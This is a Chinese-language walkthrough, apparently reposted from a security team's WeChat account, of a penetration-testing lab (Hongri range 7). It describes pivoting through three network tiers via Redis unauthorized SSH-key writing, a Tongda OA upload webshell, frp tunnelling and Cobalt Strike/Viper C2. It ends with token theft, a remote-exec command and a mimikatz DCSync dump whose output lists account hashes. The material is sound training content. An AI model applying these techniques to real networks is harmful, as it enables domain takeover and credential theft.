红日靶场（七）WHOAMI Penetration（一）

·DMZ IP段为192.168.1.0/24

·二层网络 IP段为192.168.52.0/24

·三层网络 IP段为192.168.93.0/24

第一层网络  

首先我们拿到靶机的ip为192.168.1.128，我们直接可以fscan进行端口扫描，发现了一个redis授权漏洞和一个Laravel的cve漏洞    

我们直接通过redis未授权写ssh密钥，拿到主机的shell

然后我们直接viper上新建监听，然后一句话上线viper

直接在靶机上运行就可以上线viper

第二层网络  

然后我们添加内网路由，查看主机的ip

发现存在内网192.168.52.0/24段的网络，我们上次fscan进行内网扫描，发现了一个通达oa    

我们先将通达的端口给转发到本地，然后进行访问

我们使用通达oa的工具进行测试发现一个文件上传的漏洞，我们直接传入🐎上线蚁剑    

然后我们通过蚁剑上传我们viper的🐎，就可以上线了

然后添加路由，但是我们发现上传的fscan没法运行，然后又是一台windows的系统，我们直接转cs上线，但是cs上线需要把我们的本地的端口转发到靶机里面，这样我们就可以监听到pc了，我们frp进行内网穿透，我们将第一台靶机设为我们的服务端，本地为客户端，这样就可以了

第一台靶机

本地kali

发现可以连通

我们可以进行测试，在本机监听8008端口，然后在靶机上去访问nc 127.0.0.1 8008，发现可以了

然后我们就可以开启cs的去监听8008端口，viper直接已将转cs，就可以上线cs了

第三层网络  

上线cs后我们进行端口的扫描，我们发现93段的ip，我们直接进行探测，然后发现DC的ip是192.168.93.30，和pc2的ip

然后通过 shell ipconfig /displaydns 来查看域名    

然后我们查看进程，会发现有域管的进程，我们可以进行令牌的窃取

然后我们进行通过域管的权限去运行我们的🐎就可以上线域管的监听了

remote-exec wmi 192.168.52.30 C:MYOAwebrootsh3.exe

然后我们尝试导出域内所有用户的hash值，发现可以导出，然后我们就可以用DCsync攻击就可以

[*] Tasked beacon to run mimikatz's lsadump::dcsync /domain:WHOAMIANONY.org /all /csv command            
[+] host called home, sent: 787057 bytes            
[+] received output:            
[DC] 'WHOAMIANONY.org' will be the domain            
[DC] 'DC.whoamianony.org' will be the DC server            
[DC] Exporting domain 'WHOAMIANONY.org'            
[rpc] Service: ldap            
[rpc] AuthnSvc : GSS_NEGOTIATE (9)            
502krbtgt6be58bfcc0a164af2408d1d3bd313c2a514            
1001whoamiab89b1295e69d353dd7614c7a3a80cec66048            
1115moretzba6723567ac2ca8993b098224ac27d9066048            
1002DC$202d13c79f52cc1d49870638e854afad532480            
1112bunnycc567d5556030b7356ee4915ff098c8f66048            
500Administratorab89b1295e69d353dd7614c7a3a80cec66048            
1113PC2$65e034039585f728c8f15fe3f3b814ed4096            
   

然后我们进行上🐎，直接上线dc，同样操作上线pc2

原文始发于微信公众号（Undefin3d安全团队）：红日靶场（七）WHOAMI Penetration（一）